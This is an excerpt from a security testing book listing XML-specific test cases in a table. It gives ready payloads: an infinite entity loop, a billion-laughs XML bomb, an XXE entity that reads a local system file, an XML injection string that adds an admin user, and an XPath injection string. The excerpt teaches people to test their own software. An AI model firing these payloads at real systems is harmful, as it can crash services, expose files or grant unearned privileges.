Hunting Security Bugs
XML is a data format. Data within that format can be used to perform attacks in other categories.Remember that character references can be used to include arbitrary characters, including nonprinting characters . The following are cases for XML-specific issues. Refer to Chapter 11.
| Sample Test Cases | |
|---|---|
| Test Case | Description |
| Use XML that isn t well formed . | Crash the parser. |
|
<!ENTITY % xx '%zz;'> <!ENTITY % zz '%xx;'> %xx; | Infinite entity reference loop. The last line of this XML causes %xx to become %zz; and then %zz becomes %xx . Now %xx should be converted again. As you can see, the entity conversion is now in an infinite loop. |
|
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE something [ <!ENTITY x0 "Developers!"> <!ENTITY x1 "&x0;&x0;"> <!ENTITY x2 "&x1;&x1;"> <!ENTITY x3 "&x2;&x2;"> <!ENTITY x4 "&x3;&x3;"> <!ENTITY x100 "&x99;&x99;"> ]> | The preceding XML first replaces &x100; with &x99;&x99; which is then replaced with &x98;&x98;&x98;&x98 . This replacement chain would continue until the replacement string eventually becomes the string Developers! repeated 2 100 times also known as a XML bomb. |
|
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE myTest [ <!ELEMENT secTest ANY> <!ENTITY xxe SYSTEM "c:/boot.ini"> ]> <secTest>&xxe;</secTest> | XML external (XXE) entity attack. If you are testingan application that takes XML input, verifythat you cannot gain access to files normally not accessible by using XML similar to c: boot.ini. |
|
User1</USER> <USER role="admin">User2 | XML injection. |
| x')] //* //*[contains( name ,'y | XPath/XQuery injection. |